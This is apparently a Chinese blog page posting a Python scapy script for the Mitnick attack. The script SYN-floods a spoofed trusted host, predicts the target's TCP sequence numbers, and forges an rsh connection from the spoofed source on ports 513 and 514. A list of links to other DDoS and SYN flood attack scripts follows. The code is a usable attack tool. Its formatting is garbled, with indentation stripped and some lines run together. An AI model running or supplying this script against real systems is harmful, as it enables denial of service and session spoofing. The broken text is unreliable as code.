syn 攻击脚本 python_python 模拟syn攻击
!/usr/bin/python
coding=utf-8
import optparse
from scapy.all import *
def synFlood(src, tgt):
# TCP源端口不断自增一,而目标端口513不变
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
# 重复4次操作
for x in range(1,5):
# 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
# 逻辑出现问题
# if preNum != 0:
if seqNum != 0:
preNum = seqNum
# 构造并发送TCP SYN包
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
# 读取SYN/ACK包的TCP序列号
seqNum = ans.getlayer(TCP).seq
if preNum != 0:
diffSeq = seqNum - preNum
print "[*] preNum: %d seqNum: %d" % (preNum, seqNum)
print "[+] TCP Seq Difference: " + str(diffSeq)
return seqNum + diffSeq
伪造TCP连接
def spoofConn(src, tgt, ack):
# 发送TCP SYN包
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514)
synPkt = IPlayer / TCPlayer
send(synPkt)# 发送TCP ACK包
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514, ack=ack)
ackPkt = IPlayer / TCPlayer
send(ackPkt)
def main():
parser = optparse.OptionParser('[*]Usage: python mitnickAttack.py -s -S -t ')
parser.add_option('-s', dest='synSpoof', type='string', help='specifc src for SYN Flood')
parser.add_option('-S', dest='srcSpoof', type='string', help='specify src for spoofed connection')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
(options, args) = parser.parse_args()
if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
print parser.usage
exit(0)
else:
synSpoof = options.synSpoof
srcSpoof = options.srcSpoof
tgt = options.tgtprint '[+] Starting SYN Flood to suppress remote server.'
synFlood(synSpoof, srcSpoof)
print '[+] Calculating correct TCP Sequence Number.'
seqNum = calTSN(tgt) + 1
print '[+] Spoofing Connection.'
spoofConn(srcSpoof, tgt, seqNum)
print '[+] Done.'
if name == 'main':
main()
syn 攻击脚本 python_python 模拟syn攻击相关推荐
- python ddos攻击脚本_python版本DDOS攻击脚本
今天为了休息下,换换脑子,于是就找到了我之前收藏的一篇python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了. 附上源码pyDdos.py:#!/usr/bin/env pytho ...
- Linux CC攻击脚本
Linux CC攻击脚本 CC(ChallengeCollapsar)主要是用来攻击页面的.大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越 ...
- syn flood 攻击 c 语言源代码,以太网模拟syn flood攻击
以太网模拟syn flood攻击 (2012-06-08 00:55:49) 标签: 以太网 杂谈 以太网模拟syn flood攻击最近在网上找了一些模拟syn flood攻击的c语言源代码,顺便写了 ...
- SYN洪水攻击的原理,syn洪水攻击的解决办法
SYN洪水攻击的原理及解决办法分享 SYN洪水攻击的原理 遭到SYN攻击该如何防御呢? 1.修改等待数 2.启用syncookies 3.修改重试次数 4.限制单IP并发数 5.限制C类子网并发数 6 ...
- TCP的FIN、ACK、SYN、URG、PSH及攻击方式
From: http://www.hackbase.com/tech/2009-10-08/56746.html 三次握手Three-way Handshake 一个虚拟连接的建立是通过三次握手来实现 ...
- SYN,ICMP, UDP Flood攻击原理与防护
DoS(Denial of Service拒绝服务)和DDoS(Distributed Denial of Service分布式拒绝服务)攻击是大型网站和网络服务器的安全威胁之一.2000年2月,Ya ...
- python模拟ddos攻击_python版DDOS攻击脚本
本文实例为大家分享了python版DDOS攻击脚本,供大家参考,具体内容如下 于是就找到了我之前收藏的一篇python的文章,是关于ddos攻击的一个脚本,正好今天有空,就实践下了. 附上源码pyDd ...
- Linux实战:awl-2.0工具模拟洪水攻击,建立大量的TCP连接
实战:awl工具模拟洪水攻击,建立大量未完成第二次握手的TCP连接 基于TCP协议的数据传输,需要进行三次握手四次挥手才可以完成.每一次连接都会占用系统内存,直至连接关闭才会释放系统内存.在进行第一次 ...
- Python协议攻击脚本(一): Scapy的使用
Python协议攻击脚本(一): Scapy基本的使用 文章目录 Python协议攻击脚本(一): Scapy基本的使用 简介 安装 Linux Mac Windows 基本使用 交互式 模块使用 简 ...
最新文章
- 正确的WordPress文件权限[关闭]
- linux下的文本编辑
- 转载:由图片SEO想起
- .net core实践系列之短信服务-架构优化
- spring 构造函数注入_Spring构造函数注入和参数名称
- LoRaWAN 巩固了其作为低功耗广域网主导技术的地位
- matplotlib plt.plot
- JavaMail中解决中文附件名乱码的问题
- 【JAVA 第三章 流程控制语句】课后习题 找零钱
- 计算机技能测试题九,计算机技能培训后人人过关测试试题九
- 【编译】StreamInsight简介
- java集合框架(二):HashTable
- pytorch---模型加载与保存(2)
- Matlab中值滤波去噪
- TARA-Asset穷举
- mysql红黑联盟_MySQL在Centos的卸载和安装 - MySQL - 红黑联盟
- MySQL 根据身份证查找年龄段
- python 对接萤石云,录制可播放的MP4视频
- GPS GLONASS数据文件类型解析
- 列表中使用bootstrap-switch开关